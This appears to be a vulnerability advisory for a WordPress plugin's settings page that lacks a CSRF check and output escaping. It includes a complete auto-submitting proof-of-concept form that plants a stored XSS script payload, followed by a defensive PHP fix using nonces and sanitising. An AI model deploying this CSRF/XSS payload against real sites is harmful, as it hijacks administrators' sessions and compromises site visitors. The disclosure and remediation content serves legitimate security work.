The plugin does not have a CSRF check when saving its settings, and does not sanitise and escape some of them, which could allow an attacker to make a logged-in admin change them and perform Cross-Site Scripting attacks.
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=fca_pc_settings_page" id="hack" method="post">
<input type="hidden" name="fca_pc[has_save]" value="1" />
<input type="hidden" name="fca_pc_save" value="1" />
<input type="hidden" name="fca[trigger_type]" value="post" />
<input type="hidden" name="fca_pc[event_name]" value="" />
<input type="hidden" name="fca_pc[value]" value="" />
<input type="hidden" name="fca_pc[currency]" value="" />
<input type="hidden" name="fca_pc[content_name]" value="" />
<input type="hidden" name="fca_pc[content_type]" value="product" />
<input type="hidden" name="fca_pc[content_ids]" value="" />
<input type="hidden" name="fca_pc[content_category]" value="" />
<input type="hidden" name="fca_pc[search_string]" value="" />
<input type="hidden" name="fca_pc[num_items]" value="" />
<input type="hidden" name="fca_pc[status]" value="" />
<input type="hidden" name="fca_pc[google_product_category]" value="'><script>alert(document.domain);</script>" />
<input type="submit" value="submit request" />
</form>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</body>
</html>
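The two missing controls described above (a nonce check on save, and sanitising on input plus escaping on output), as an added example that is not the plugin's own code. The function names, nonce names and the option name `example_pc_settings` are hypothetical; only the `fca_pc[...]` field names and `fca_pc_save` come from the form above, and the code assumes it runs inside WordPress.

```php
<?php
// Added example, not the plugin's code. Hypothetical names: both functions,
// the nonce action/field and the option 'example_pc_settings'.
const EXAMPLE_NONCE_ACTION = 'example_pc_save_settings';
const EXAMPLE_NONCE_FIELD  = 'example_pc_nonce';

function example_pc_save_settings() {
    if ( empty( $_POST['fca_pc_save'] ) ) {
        return; // Not a settings save request.
    }
    // Authorisation: only users who may manage options can save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF: dies unless the POST carries a valid nonce for this action.
    // A cross-site auto-submitting form cannot know the nonce value.
    check_admin_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );

    $raw = ( isset( $_POST['fca_pc'] ) && is_array( $_POST['fca_pc'] ) )
        ? wp_unslash( $_POST['fca_pc'] )
        : array();
    // Allow-list of expected keys (taken from the form fields on this page).
    $keys = array( 'event_name', 'value', 'currency', 'content_name',
        'content_type', 'content_ids', 'content_category', 'search_string',
        'num_items', 'status', 'google_product_category' );
    $clean = array();
    foreach ( $keys as $key ) {
        // Sanitise on input: strips tags, rejects nested arrays.
        $clean[ $key ] = ( isset( $raw[ $key ] ) && is_scalar( $raw[ $key ] ) )
            ? sanitize_text_field( $raw[ $key ] )
            : '';
    }
    update_option( 'example_pc_settings', $clean );
}
add_action( 'admin_init', 'example_pc_save_settings' );

function example_pc_render_settings_form() {
    $settings = get_option( 'example_pc_settings', array() );
    $category = isset( $settings['google_product_category'] )
        ? $settings['google_product_category'] : '';
    ?>
    <form method="post">
        <?php wp_nonce_field( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD ); ?>
        <input type="hidden" name="fca_pc_save" value="1" />
        <!-- Escape on output: quotes and angle brackets cannot break out of the attribute. -->
        <input type="text" name="fca_pc[google_product_category]"
               value="<?php echo esc_attr( $category ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```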